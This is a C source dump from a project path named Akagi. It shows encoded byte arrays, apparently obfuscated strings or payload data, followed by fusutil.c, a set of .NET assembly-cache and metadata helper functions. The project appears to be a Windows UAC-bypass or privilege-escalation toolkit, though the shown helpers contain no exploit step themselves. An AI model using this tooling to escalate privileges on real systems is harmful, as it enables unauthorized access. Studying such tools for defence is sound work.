0x4E, 0xE0, 0xFD, 0x83, 0x46, 0x0E, 0x7E, 0x3A, 0x00, 0xE8, 0xB8, 0xA3, 0x29, 0x8C, 0x76, 0x30,
0x12, 0xC2, 0xA4, 0x09, 0x51, 0x24, 0x27, 0x90, 0x4E, 0x40, 0xF5, 0x03, 0x62, 0x0E, 0x64, 0x38,
0x04, 0xE0, 0xFC, 0x83, 0x25, 0x0E, 0x5C, 0x3A, 0x01, 0xE8, 0xA5, 0xA3, 0x2E, 0x8C, 0x77, 0x30,
0x13, 0xC2, 0xA6, 0x09, 0x2C, 0x24, 0x74, 0x90, 0x65, 0x40, 0xF9, 0x03, 0x62, 0x0E, 0x7F, 0x38,
0x4E, 0xE0, 0xFD, 0x83, 0x44, 0x0E, 0x72, 0x3A, 0x19, 0xE8, 0xBC, 0xA3, 0x27, 0x8C, 0x76, 0x30,
0x05, 0xC2, 0xBA, 0x09
};
static const unsigned char g_encodedTaskParamEnd[69] = {
0x5D, 0xC2, 0xAB, 0x09, 0x51, 0x24, 0x27, 0x90, 0x4D, 0x40, 0xEC, 0x03, 0x66, 0x0E, 0x72, 0x38,
0x14, 0xE0, 0xFF, 0x83, 0x3B, 0x0E, 0x32, 0x3A, 0x31, 0xE8, 0xA9, 0xA3, 0x23, 0x8C, 0x7B, 0x30,
0x5F, 0xC2, 0xB8, 0x09, 0x3D, 0x24, 0x09, 0x90, 0x43, 0x40, 0xF5, 0x03, 0x6E, 0x0E, 0x73, 0x38,
0x1E, 0xE0, 0xB2, 0x83, 0x39, 0x0E, 0x21, 0x3A, 0x5B, 0xE8, 0x85, 0xA3, 0x27, 0x8C, 0x6B, 0x30,
0x0A, 0xC2, 0xBA, 0x09, 0x12
};
static const unsigned char g_webviewvsinfo[1224] = {
0xBB, 0xE2, 0xF9, 0x9B, 0x37, 0x6E, 0x8A, 0xB8, 0x22, 0xE2, 0x9A, 0x8B, 0x40, 0x2C, 0x1D, 0xB0,
0x33, 0xC2, 0xD6, 0x0B, 0x5E, 0x2E, 0x13, 0xB9, 0x3D, 0xE6, 0x92, 0x9B, 0x7E, 0x6E, 0x92, 0xB9,
0x35, 0xE6, 0x82, 0x9B, 0x37, 0x6E, 0xDC, 0xB8, 0xCC, 0xE6, 0x2A, 0x75, 0x16, 0x2C, 0x59, 0xB0,
0x61, 0xC2, 0x84, 0x0B, 0x17, 0x2E, 0x5C, 0xB9, 0x73, 0xE6, 0xCC, 0x9B, 0x37, 0x6E, 0xDC, 0xB9,
0x4C, 0xE6, 0xCD, 0x9B, 0x37, 0x6E, 0xDC, 0xB8, 0x75, 0xE2, 0xC5, 0x8B, 0x14, 0x2C, 0x58, 0xB0,
0x61, 0xC2, 0x85, 0x0B, 0x17, 0x2E, 0x5C, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x1F, 0x6A, 0xDC, 0xB9,
0x73, 0xE6, 0x9E, 0x9B, 0x43, 0x6E, 0xAE, 0xB8, 0x18, 0xE2, 0xAB, 0x8B, 0x71, 0x2C, 0x1E, 0xB0,
0x08, 0xC2, 0xE9, 0x0B, 0x72, 0x2E, 0x15, 0xB9, 0x1D, 0xE6, 0xAB, 0x9B, 0x58, 0x6E, 0xDC, 0xB9,
0x77, 0xE2, 0xCD, 0x9B, 0x37, 0x6E, 0xEC, 0xB8, 0x45, 0xE2, 0xF5, 0x8B, 0x2F, 0x2C, 0x68, 0xB0,
0x55, 0xC2, 0xC7, 0x0B, 0x27, 0x2E, 0x5C, 0xB9, 0x3F, 0xE6, 0xE1, 0x9B, 0x36, 0x6E, 0x9F, 0xB9,
0x1C, 0xE6, 0xA0, 0x9B, 0x47, 0x6E, 0xBD, 0xB8, 0x1F, 0xE2, 0xBC, 0x8B, 0x58, 0x2C, 0x39, 0xB0,
0x0C, 0xC2, 0xE0, 0x0B, 0x17, 0x2E, 0x5C, 0xB9, 0x3E, 0xE6, 0xA4, 0x9B, 0x54, 0x6E, 0xAE, 0xB9,
0x1C, 0xE6, 0xBE, 0x9B, 0x58, 0x6E, 0xBA, 0xB8, 0x05, 0xE2, 0xE5, 0x8B, 0x55, 0x2C, 0x37, 0xB0,
0x13, 0xC2, 0xF5, 0x0B, 0x78, 0x2E, 0x2E, 0xB9, 0x12, 0xE6, 0xB9, 0x9B, 0x5E, 0x6E, 0xB3, 0xB9,
0x1D, 0xE6, 0xCD, 0x9B, 0xBF, 0x6E, 0x82, 0xB8, 0x70, 0xE2, 0x83, 0x8B, 0x7F, 0x2C, 0x34, 0xB0,
0x04, 0xC2, 0xC1, 0x0B, 0x72, 0x2E, 0x2F, 0xB9, 0x10, 0xE6, 0xBF, 0x9B, 0x5E, 0x6E, 0xAC, 0xB9,
0x07, 0xE6, 0xA4, 0x9B, 0x58, 0x6E, 0xB2, 0xB8, 0x71, 0xE2, 0xC5, 0x8B, 0x5B, 0x2C, 0x31, 0xB0,
0x02, 0xC2, 0xF7, 0x0B, 0x78, 0x2E, 0x2F, 0xB9, 0x1C, 0xE6, 0xAB, 0x9B, 0x43, 0x6E, 0xFC, 0xB9,
0x36, 0xE6, 0xA9, 0x9B, 0x50, 0x6E, 0xB9, 0xB8, 0x51, 0xE2, 0x80, 0x8B, 0x7B, 0x2C, 0x3A, 0xB0,
0x04, 0xC2, 0xE1, 0x0B, 0x73, 0x2E, 0x39, 0xB9, 0x17, 0xE6, 0xED, 0x9B, 0x75, 0x6E, 0xAE, 0xB9,
0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB8, 0x03, 0xE2, 0xE5, 0x8B, 0x41, 0x2C, 0x3D, 0xB0,
0x03, 0xC2, 0xD3, 0x0B, 0x7E, 0x2E, 0x39, 0xB9, 0x04, 0xE6, 0xED, 0x9B, 0x74, 0x6E, 0xB0, 0xB9,
0x1A, 0xE6, 0xA8, 0x9B, 0x59, 0x6E, 0xA8, 0xB8, 0x71, 0xE2, 0xC5, 0x8B, 0x26, 0x2C, 0x48, 0xB0,
0x60, 0xC2, 0xC3, 0x0B, 0x7E, 0x2E, 0x30, 0xB9, 0x16, 0xE6, 0x9B, 0x9B, 0x52, 0x6E, 0xAE, 0xB9,
0x00, 0xE6, 0xA4, 0x9B, 0x58, 0x6E, 0xB2, 0xB8, 0x71, 0xE2, 0xC5, 0x8B, 0x27, 0x2C, 0x76, 0xB0,
0x51, 0xC2, 0xAB, 0x0B, 0x27, 0x2E, 0x72, 0xB9, 0x43, 0xE6, 0xCD, 0x9B, 0x6F, 0x6E, 0xEA, 0xB9,
0x72, 0xE6, 0x84, 0x9B, 0x59, 0x6E, 0xA8, 0xB8, 0x14, 0xE2, 0xB7, 0x8B, 0x78, 0x2C, 0x39, 0xB0,
0x0D, 0xC2, 0xCB, 0x0B, 0x76, 0x2E, 0x31, 0xB9, 0x16, 0xE6, 0xCD, 0x9B, 0x72, 0x6E, 0xB1, 0xB9,
0x11, 0xE6, 0xA8, 0x9B, 0x53, 0x6E, 0xB8, 0xB8, 0x14, 0xE2, 0xA1, 0x8B, 0x54, 0x2C, 0x2A, 0xB0,
0x0E, 0xC2, 0xF2, 0x0B, 0x64, 0x2E, 0x39, 0xB9, 0x01, 0xE6, 0x9A, 0x9B, 0x52, 0x6E, 0xBE, 0xB9,
0x25, 0xE6, 0xA4, 0x9B, 0x52, 0x6E, 0xAB, 0xB8, 0x5F, 0xE2, 0xA1, 0x8B, 0x7A, 0x2C, 0x34, 0xB0,
0x61, 0xC2, 0x85, 0x0B, 0x87, 0x2E, 0x30, 0xB9, 0x72, 0xE6, 0x81, 0x9B, 0x52, 0x6E, 0xBB, 0xB9,
0x12, 0xE6, 0xA1, 0x9B, 0x74, 0x6E, 0xB3, 0xB8, 0x01, 0xE2, 0xBC, 0x8B, 0x64, 0x2C, 0x31, 0xB0,
0x06, 0xC2, 0xED, 0x0B, 0x63, 0x2E, 0x5C, 0xB9, 0x30, 0xE6, 0xA2, 0x9B, 0x47, 0x6E, 0xA5, 0xB9,
0x01, 0xE6, 0xA4, 0x9B, 0x50, 0x6E, 0xB4, 0xB8, 0x05, 0xE2, 0xE5, 0x8B, 0x5B, 0x2C, 0x31, 0xB0,
0x02, 0xC2, 0xF7, 0x0B, 0x78, 0x2E, 0x2F, 0xB9, 0x1C, 0xE6, 0xAB, 0x9B, 0x43, 0x6E, 0xFC, 0xB9,
0x30, 0xE6, 0xA2, 0x9B, 0x45, 0x6E, 0xAC, 0xB8, 0x1E, 0xE2, 0xB7, 0x8B, 0x77, 0x2C, 0x2C, 0xB0,
0x08, 0xC2, 0xEA, 0x0B, 0x79, 0x2E, 0x72, 0xB9, 0x53, 0xE6, 0x8C, 0x9B, 0x5B, 0x6E, 0xB0, 0xB9,
0x53, 0xE6, 0xBF, 0x9B, 0x5E, 0x6E, 0xBB, 0xB8, 0x19, 0xE2, 0xB1, 0x8B, 0x65, 0x2C, 0x78, 0xB0,
0x13, 0xC2, 0xE0, 0x0B, 0x64, 0x2E, 0x39, 0xB9, 0x01, 0xE6, 0xBB, 0x9B, 0x52, 0x6E, 0xB8, 0xB9,
0x5D, 0xE6, 0xCD, 0x9B, 0x57, 0x6E, 0xEA, 0xB8, 0x70, 0xE2, 0x8A, 0x8B, 0x64, 0x2C, 0x31, 0xB0,
0x06, 0xC2, 0xEC, 0x0B, 0x79, 0x2E, 0x3D, 0xB9, 0x1F, 0xE6, 0x8B, 0x9B, 0x5E, 0x6E, 0xB0, 0xB9,
0x16, 0xE6, 0xA3, 0x9B, 0x56, 0x6E, 0xB1, 0xB8, 0x14, 0xE2, 0xC5, 0x8B, 0x53, 0x2C, 0x35, 0xB0,
0x03, 0xC2, 0xE0, 0x0B, 0x73, 0x2E, 0x38, 0xB9, 0x16, 0xE6, 0xA9, 0x9B, 0x75, 0x6E, 0xAE, 0xB9,
0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB8, 0x03, 0xE2, 0x92, 0x8B, 0x73, 0x2C, 0x3A, 0xB0,
0x37, 0xC2, 0xEC, 0x0B, 0x72, 0x2E, 0x2B, 0xB9, 0x5D, 0xE6, 0xA9, 0x9B, 0x5B, 0x6E, 0xB0, 0xB9,
0x73, 0xE6, 0xCD, 0x9B, 0xB7, 0x6E, 0x82, 0xB8, 0x70, 0xE2, 0x95, 0x8B, 0x64, 0x2C, 0x37, 0xB0,
0x05, 0xC2, 0xF0, 0x0B, 0x74, 0x2E, 0x28, 0xB9, 0x3D, 0xE6, 0xAC, 0x9B, 0x5A, 0x6E, 0xB9, 0xB9,
0x73, 0xE6, 0xCD, 0x9B, 0x7A, 0x6E, 0xB5, 0xB8, 0x12, 0xE2, 0xB7, 0x8B, 0x79, 0x2C, 0x2B, 0xB0,
0x0E, 0xC2, 0xE3, 0x0B, 0x63, 0x2E, 0x7C, 0xB9, 0x36, 0xE6, 0xA9, 0x9B, 0x50, 0x6E, 0xB9, 0xB9,
0x53, 0xE6, 0x88, 0x9B, 0x5A, 0x6E, 0xBE, 0xB8, 0x14, 0xE2, 0xA1, 0x8B, 0x72, 0x2C, 0x3D, 0xB0,
0x05, 0xC2, 0xA5, 0x0B, 0x55, 0x2E, 0x2E, 0xB9, 0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB9,
0x01, 0xE6, 0xED, 0x9B, 0x60, 0x6E, 0xB9, 0xB8, 0x13, 0xE2, 0x93, 0x8B, 0x7F, 0x2C, 0x3D, 0xB0,
0x16, 0xC2, 0xA5, 0x0B, 0x54, 0x2E, 0x30, 0xB9, 0x1A, 0xE6, 0xA8, 0x9B, 0x59, 0x6E, 0xA8, 0xB9,
0x73, 0xE6, 0xCD, 0x9B, 0x03, 0x6E, 0xCC, 0xB8, 0x70, 0xE2, 0x95, 0x8B, 0x64, 0x2C, 0x37, 0xB0,
0x05, 0xC2, 0xF0, 0x0B, 0x74, 0x2E, 0x28, 0xB9, 0x25, 0xE6, 0xA8, 0x9B, 0x45, 0x6E, 0xAF, 0xB9,
0x1A, 0xE6, 0xA2, 0x9B, 0x59, 0x6E, 0xDC, 0xB8, 0x40, 0xE2, 0xEB, 0x8B, 0x26, 0x2C, 0x76, 0xB0,
0x51, 0xC2, 0xAB, 0x0B, 0x27, 0x2E, 0x5C, 0xB9, 0x4F, 0xE6, 0xD9, 0x9B, 0x36, 0x6E, 0x9F, 0xB9,
0x1C, 0xE6, 0xA0, 0x9B, 0x47, 0x6E, 0xBD, 0xB8, 0x1F, 0xE2, 0xBC, 0x8B, 0x45, 0x2C, 0x30, 0xB0,
0x0E, 0xC2, 0xF7, 0x0B, 0x63, 0x2E, 0x12, 0xB9, 0x12, 0xE6, 0xA0, 0x9B, 0x52, 0x6E, 0xDC, 0xB9,
0x3E, 0xE6, 0xA4, 0x9B, 0x54, 0x6E, 0xAE, 0xB8, 0x1E, 0xE2, 0xB6, 0x8B, 0x79, 0x2C, 0x3E, 0xB0,
0x15, 0xC2, 0x85, 0x0B, 0x9F, 0x2E, 0x02, 0xB9, 0x72, 0xE6, 0x9D, 0x9B, 0x45, 0x6E, 0xB3, 0xB9,
0x17, 0xE6, 0xB8, 0x9B, 0x54, 0x6E, 0xA8, 0xB8, 0x22, 0xE2, 0xAD, 0x8B, 0x79, 0x2C, 0x2A, 0xB0,
0x15, 0xC2, 0xCB, 0x0B, 0x76, 0x2E, 0x31, 0xB9, 0x16, 0xE6, 0xCD, 0x9B, 0x7A, 0x6E, 0xB5, 0xB9,
0x10, 0xE6, 0xBF, 0x9B, 0x58, 0x6E, 0xAF, 0xB8, 0x1E, 0xE2, 0xA3, 0x8B, 0x62, 0x2C, 0x78, 0xB0,
0x24, 0xC2, 0xE1, 0x0B, 0x70, 0x2E, 0x39, 0xB9, 0x53, 0xE6, 0x88, 0x9B, 0x5A, 0x6E, 0xBE, 0xB9,
0x16, 0xE6, 0xA9, 0x9B, 0x53, 0x6E, 0xB9, 0xB8, 0x15, 0xE2, 0xE5, 0x8B, 0x54, 0x2C, 0x2A, 0xB0,
0x0E, 0xC2, 0xF2, 0x0B, 0x64, 0x2E, 0x39, 0xB9, 0x01, 0xE6, 0xED, 0x9B, 0x60, 0x6E, 0xB9, 0xB9,
0x11, 0xE6, 0x9B, 0x9B, 0x5E, 0x6E, 0xB9, 0xB8, 0x06, 0xE2, 0xE5, 0x8B, 0x55, 0x2C, 0x34, 0xB0,
0x08, 0xC2, 0xE0, 0x0B, 0x79, 0x2E, 0x28, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x1F, 0x6E, 0xD8, 0xB9,
0x72, 0xE6, 0x82, 0x9B, 0x51, 0x6E, 0xBA, 0xB8, 0x18, 0xE2, 0xA6, 0x8B, 0x7F, 0x2C, 0x39, 0xB0,
0x0D, 0xC2, 0xA5, 0x0B, 0x55, 0x2E, 0x29, 0xB9, 0x1A, 0xE6, 0xA1, 0x9B, 0x53, 0x6E, 0xDC, 0xB9,
0x42, 0xE6, 0xCD, 0x9B, 0x73, 0x6E, 0xDC, 0xB8, 0x71, 0xE2, 0x93, 0x8B, 0x77, 0x2C, 0x2A, 0xB0,
0x27, 0xC2, 0xEC, 0x0B, 0x7B, 0x2E, 0x39, 0xB9, 0x3A, 0xE6, 0xA3, 0x9B, 0x51, 0x6E, 0xB3, 0xB9,
0x73, 0xE6, 0xCD, 0x9B, 0x13, 0x6E, 0xD8, 0xB8, 0x71, 0xE2, 0x91, 0x8B, 0x64, 0x2C, 0x39, 0xB0,
0x0F, 0xC2, 0xF6, 0x0B, 0x7B, 0x2E, 0x3D, 0xB9, 0x07, 0xE6, 0xA4, 0x9B, 0x58, 0x6E, 0xB2, 0xB9,
0x73, 0xE6, 0xCD, 0x9B, 0x3E, 0x6A, 0x6C, 0xBC
};
================================================
FILE: Source/Akagi/fusutil.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2020 - 2026
*
* TITLE: FUSUTIL.C
*
* VERSION: 3.69
*
* DATE: 12 Feb 2026
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* fusUtilInitFusion
*
* Purpose:
*
* Load .NET Assembly Manager dll and remember function pointers.
*
*/
BOOLEAN fusUtilInitFusion(
_In_ DWORD dwVersion
)
{
HMODULE hFusion;
LPCWSTR lpFusionDir;
pfnCreateAssemblyCache CreateAssemblyCache;
pfnCreateAssemblyEnum CreateAssemblyEnum;
WCHAR szBuffer[MAX_PATH * 2];
if (g_ctx->FusionContext.Initialized)
return TRUE;
if (dwVersion != 2 && dwVersion != 4)
return FALSE;
//
// Build path to assembly manager dll
//
_strcpy(szBuffer, g_ctx->szSystemRoot);
_strcat(szBuffer, MSNETFRAMEWORK_DIR);
#ifdef _WIN64
_strcat(szBuffer, TEXT("64"));
#endif
if (dwVersion == 2)
lpFusionDir = NET2_DIR;
else
lpFusionDir = NET4_DIR;
supConcatenatePaths(szBuffer, lpFusionDir, ARRAYSIZE(szBuffer));
supConcatenatePaths(szBuffer, TEXT("fusion.dll"), ARRAYSIZE(szBuffer));
hFusion = LoadLibraryEx(szBuffer, NULL, 0);
if (hFusion == NULL)
return FALSE;
CreateAssemblyCache = (pfnCreateAssemblyCache)GetProcAddress(hFusion, "CreateAssemblyCache");
CreateAssemblyEnum = (pfnCreateAssemblyEnum)GetProcAddress(hFusion, "CreateAssemblyEnum");
if (CreateAssemblyCache == NULL ||
CreateAssemblyEnum == NULL)
{
FreeLibrary(hFusion);
return FALSE;
}
g_ctx->FusionContext.hFusion = hFusion;
g_ctx->FusionContext.CreateAssemblyCache = CreateAssemblyCache;
g_ctx->FusionContext.CreateAssemblyEnum = CreateAssemblyEnum;
g_ctx->FusionContext.Initialized = TRUE;
return TRUE;
}
/*
* fusUtilBinToUnicodeHex
*
* Purpose:
*
* Bin to Hex special edition.
*
*/
VOID fusUtilBinToUnicodeHex(
_In_ const BYTE* pSrc,
_In_ UINT cSrc,
_Out_cap_(2 * cSrc + 1) LPWSTR pDst)
{
UINT x;
UINT y;
#define TOHEX(a) (WCHAR)((a)>=10 ? L'a'+(a)-10 : L'0'+(a))
for (x = 0, y = 0; x < cSrc; ++x)
{
UINT v;
v = pSrc[x] >> 4;
pDst[y++] = TOHEX(v);
v = pSrc[x] & 0x0f;
pDst[y++] = TOHEX(v);
}
pDst[y] = L'\0';
}
/*
* fusUtilGetAssemblyName
*
* Purpose:
*
* Return assembly name.
*
* Note: Use supHeapFree to release lpAssemblyName allocated memory.
*
*/
HRESULT fusUtilGetAssemblyName(
_In_ IAssemblyName* pInterface,
_Inout_ LPWSTR* lpName,
_Out_opt_ PSIZE_T pcchName,
_Inout_opt_ LPWSTR* lpDisplayName,
_Out_opt_ PSIZE_T pcchDisplayName
)
{
DWORD cchName = 0;
HRESULT hr;
LPWSTR assemblyName = NULL, displayName = NULL;
do {
if (pcchName) *pcchName = 0;
if (pcchDisplayName) *pcchDisplayName = 0;
hr = pInterface->lpVtbl->GetName(pInterface, &cchName, NULL);
if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))
break;
assemblyName = (LPWSTR)supHeapAlloc((cchName * sizeof(WCHAR)) + sizeof(UNICODE_NULL));
if (assemblyName)
hr = pInterface->lpVtbl->GetName(pInterface, &cchName, (LPOLESTR)assemblyName);
else
hr = E_OUTOFMEMORY;
if (pcchName) {
if (SUCCEEDED(hr))
*pcchName = cchName;
}
cchName = 0;
hr = pInterface->lpVtbl->GetDisplayName(pInterface, NULL, &cchName, 0);
if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))
break;
displayName = (LPWSTR)supHeapAlloc((cchName * sizeof(WCHAR)) + sizeof(UNICODE_NULL));
if (displayName)
hr = pInterface->lpVtbl->GetDisplayName(pInterface, (LPOLESTR)displayName, &cchName, 0);
else
hr = E_OUTOFMEMORY;
if (pcchDisplayName) {
if (SUCCEEDED(hr))
*pcchDisplayName = cchName;
}
} while (FALSE);
*lpName = assemblyName;
if (lpDisplayName)
*lpDisplayName = displayName;
return hr;
}
/*
* fusUtilGetAssemblyMVIDFromZapCache
*
* Purpose:
*
* Query cache zap assembly mvid.
*
*/
BOOL fusUtilGetAssemblyMVIDFromZapCache(
_In_ LPCWSTR AssemblyName,
_Inout_ GUID* ModuleVersionId
)
{
BOOL bFound = FALSE, bResult = FALSE;
HRESULT hr;
IAssemblyEnum* asmEnum = NULL;
IAssemblyName* asmName = NULL;
LPWSTR lpAssemblyName = NULL;
DWORD dwSize;
do {
hr = g_ctx->FusionContext.CreateAssemblyEnum(&asmEnum, NULL, NULL, ASM_CACHE_ZAP, NULL);
if ((FAILED(hr)) || (asmEnum == NULL))
break;
//
// Locate assembly and remember it name/display name.
//
while ((hr = asmEnum->lpVtbl->GetNextAssembly(asmEnum, NULL, &asmName, 0)) == S_OK) {
if (SUCCEEDED(fusUtilGetAssemblyName(asmName,
&lpAssemblyName,
NULL,
NULL,
NULL)))
{
if (_strcmpi(AssemblyName, lpAssemblyName) == 0) {
bFound = TRUE;
break;
}
else {
supHeapFree(lpAssemblyName);
lpAssemblyName = NULL;
}
}
asmName->lpVtbl->Finalize(asmName);
asmName->lpVtbl->Release(asmName);
}
if (FAILED(hr) || bFound == FALSE)
break;
dwSize = 0;
hr = asmName->lpVtbl->GetProperty(asmName, ASM_NAME_MVID, NULL, &dwSize);
if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))
break;
if (dwSize != sizeof(GUID))
break;
hr = asmName->lpVtbl->GetProperty(asmName, ASM_NAME_MVID, ModuleVersionId, &dwSize);
bResult = SUCCEEDED(hr);
} while (FALSE);
if (asmName) {
asmName->lpVtbl->Finalize(asmName);
asmName->lpVtbl->Release(asmName);
}
if (asmEnum)
asmEnum->lpVtbl->Release(asmEnum);
if (lpAssemblyName)
supHeapFree(lpAssemblyName);
return bResult;
}
/*
* fusUtilGetAssemblyPath
*
* Purpose:
*
* Return given assembly file path.
*
* Note: Use supHeapFree to release lpAssemblyPath allocated memory.
*
*/
HRESULT fusUtilGetAssemblyPath(
_In_ IAssemblyCache* pInterface,
_In_ LPCWSTR lpAssemblyName,
_Inout_ LPCWSTR* lpAssemblyPath
)
{
HRESULT hr = E_FAIL;
ASSEMBLY_INFO asmInfo;
LPWSTR assemblyPath;
*lpAssemblyPath = NULL;
RtlSecureZeroMemory(&asmInfo, sizeof(asmInfo));
pInterface->lpVtbl->QueryAssemblyInfo(pInterface,
QUERYASMINFO_FLAG_GETSIZE,
lpAssemblyName,
&asmInfo);
if (asmInfo.cchBuf == 0) //empty pszCurrentAssemblyPathBuf
return E_FAIL;
assemblyPath = (LPWSTR)supHeapAlloc(asmInfo.cchBuf * sizeof(WCHAR));
if (assemblyPath == NULL)
return E_FAIL;
asmInfo.pszCurrentAssemblyPathBuf = assemblyPath;
hr = pInterface->lpVtbl->QueryAssemblyInfo(pInterface,
QUERYASMINFO_FLAG_VALIDATE,
lpAssemblyName,
&asmInfo);
if (!SUCCEEDED(hr)) {
supHeapFree(asmInfo.pszCurrentAssemblyPathBuf);
}
else {
*lpAssemblyPath = assemblyPath;
}
return hr;
}
/*
* fusUtilGetAssemblyPathByName
*
* Purpose:
*
* Return given assembly file path.
*
* Note: Use supHeapFree to release lpAssemblyPath allocated memory.
*
*/
BOOLEAN fusUtilGetAssemblyPathByName(
_In_ LPWSTR lpAssemblyName,
_Inout_ LPWSTR* lpAssemblyPath
)
{
HRESULT hr;
IAssemblyCache* asmCache = NULL;
do {
hr = g_ctx->FusionContext.CreateAssemblyCache(&asmCache, 0);
if ((FAILED(hr)) || (asmCache == NULL))
break;
hr = fusUtilGetAssemblyPath(asmCache,
lpAssemblyName,
lpAssemblyPath);
asmCache->lpVtbl->Release(asmCache);
} while (FALSE);
return SUCCEEDED(hr);
}
/*
* fusUtilReferenceStreamByName
*
* Purpose:
*
* Query stream pointer by stream name.
*
*/
BOOL fusUtilReferenceStreamByName(
_In_ STORAGEHEADER* StorageHeader,
_In_ LPCSTR StreamName,
_Out_ PSTORAGESTREAM* StreamRef
)
{
WORD i;
PBYTE streamPtr;
STORAGESTREAM* pStorStream;
ULONG offset;
SIZE_T nameLen;
*StreamRef = NULL;
streamPtr = (PBYTE)RtlOffsetToPointer(StorageHeader, sizeof(STORAGEHEADER));
i = 0;
do {
pStorStream = (STORAGESTREAM*)streamPtr;
if (IsBadReadPtr(pStorStream->rcName, sizeof(CHAR)))
return FALSE;
if (_strcmpi_a(pStorStream->rcName, StreamName) == 0) {
*StreamRef = pStorStream;
return TRUE;
}
nameLen = _strlen_a(pStorStream->rcName) + 1;
if (nameLen > MAXUSHORT)
return FALSE;
offset = ALIGN_UP(FIELD_OFFSET(STORAGESTREAM, rcName) + nameLen, ULONG);
streamPtr = (PBYTE)RtlOffsetToPointer(streamPtr, offset);
i++;
} while (i < StorageHeader->iStreams);
return FALSE;
}
/*
* fusUtilGetImageMVID
*
* Purpose:
*
* Query MVID value from image metadata.
*
* Ref: https://www.ntcore.com/files/dotnetformat.htm
*
*/
BOOL fusUtilGetImageMVID(
_In_ LPCWSTR lpImageName,
_Out_ GUID* ModuleVersionId
)
{
BOOL bResult = FALSE;
HMODULE hModule;
PVOID baseAddress;
IMAGE_COR20_HEADER* cliHeader;
ULONG sz, offset, mvidIndex, i;
STORAGESIGNATURE* pStorSign;
STORAGEHEADER* pStorHeader;
STORAGESTREAM* pStreamGuid;
STORAGESTREAM* pStreamTables;
STORAGETABLESHEADER* pTablesHeader;
PBYTE tablesPtr;
LPGUID guidsPtr;
RPC_STATUS st;
st = UuidCreateNil(ModuleVersionId);
if (st != S_OK)
return FALSE;
hModule = LoadLibraryEx(lpImageName, NULL, LOAD_LIBRARY_AS_IMAGE_RESOURCE);
if (hModule) {
baseAddress = (PBYTE)(((ULONG_PTR)hModule) & ~3);
cliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(baseAddress, TRUE,
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);
if (cliHeader && sz >= sizeof(IMAGE_COR20_HEADER)) {
pStorSign = (STORAGESIGNATURE*)RtlOffsetToPointer(baseAddress, cliHeader->MetaData.VirtualAddress);
if (pStorSign && !IsBadReadPtr(pStorSign, sizeof(STORAGESIGNATURE)) &&
pStorSign->lSignature == STORAGE_MAGIC_SIG)
{
offset = FIELD_OFFSET(STORAGESIGNATURE, pVersion) + pStorSign->iVersionString;
pStorHeader = (STORAGEHEADER*)RtlOffsetToPointer(pStorSign, offset);
pStreamTables = NULL;
if (!fusUtilReferenceStreamByName(pStorHeader, "#~", &pStreamTables)) {
FreeLibrary(hModule);
return FALSE;
}
pStreamGuid = NULL;
if (!fusUtilReferenceStreamByName(pStorHeader, "#GUID", &pStreamGuid)) {
FreeLibrary(hModule);
return FALSE;
}
pTablesHeader = (STORAGETABLESHEADER*)RtlOffsetToPointer(pStorSign, pStreamTables->iOffset);
sz = 0;
//
// __popcnt64 or the garbage code below
//
for (i = 0; i < MAX_CLR_TABLES; i++)
if ((i < 32 && (pTablesHeader->Valid.u.LowPart >> i) & 1) ||
(i >= 32 && (pTablesHeader->Valid.u.HighPart >> i) & 1))
{
sz++;
}
offset = FIELD_OFFSET(STORAGETABLESHEADER, Rows) + (sz * sizeof(ULONG));
tablesPtr = (PBYTE)RtlOffsetToPointer(pTablesHeader, offset);
tablesPtr += sizeof(WORD);
if (pTablesHeader->HeapOffsetSizes & MD_STRINGS_BIT)
tablesPtr += sizeof(DWORD);
else
tablesPtr += sizeof(WORD);
if (pTablesHeader->HeapOffsetSizes & MD_GUIDS_BIT)
mvidIndex = *(PULONG)tablesPtr;
else
mvidIndex = *(PUSHORT)tablesPtr;
if (mvidIndex) {
guidsPtr = (LPGUID)RtlOffsetToPointer(pStorSign, pStreamGuid->iOffset);
RtlCopyMemory(ModuleVersionId, &guidsPtr[mvidIndex - 1], sizeof(GUID));
bResult = TRUE;
}
}
}
FreeLibrary(hModule);
}
return bResult;
}
/*
* fusUtilpFusionScanFiles
*
* Purpose:
*
* Scan directory for files of given type.
*
* Note:
* Return TRUE to abort further scan, FALSE otherwise.
*
*/
BOOL fusUtilpFusionScanFiles(
_In_ LPWSTR lpDirectory,
_In_ LPWSTR lpExtension,
_In_ pfnFusionScanFilesCallback pfnCallback,
_In_opt_ PVOID pvUserContext
)
{
BOOL bResult = FALSE;
HANDLE hFile;
LPWSTR lpLookupDirectory = NULL;
SIZE_T cchBuffer;
WIN32_FIND_DATA fdata;
//
// Allocate buffer for path to the file including backslash and terminating null.
//
cchBuffer = (2 + _strlen(lpDirectory) + _strlen(lpExtension));
lpLookupDirectory = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));
if (lpLookupDirectory) {
_strcpy(lpLookupDirectory, lpDirectory);
supConcatenatePaths(lpLookupDirectory, lpExtension, cchBuffer);
hFile = FindFirstFile(lpLookupDirectory, &fdata);
if (hFile != INVALID_HANDLE_VALUE) {
do {
if (pfnCallback(lpDirectory, &fdata, pvUserContext)) {
bResult = TRUE;
break;
}
} while (FindNextFile(hFile, &fdata));
FindClose(hFile);
}
supHeapFree(lpLookupDirectory);
}
return bResult;
}
/*
* fusUtilScanDirectory
*
* Purpose:
*
* Recursively scan directories looking for files with given extension.
*
*/
BOOL fusUtilScanDirectory(
_In_ LPWSTR lpDirectory,
_In_ LPWSTR lpExtension,
_In_ pfnFusionScanFilesCallback pfnCallback,
_In_opt_ PVOID pvUserContext
)
{
BOOL bResult = FALSE;
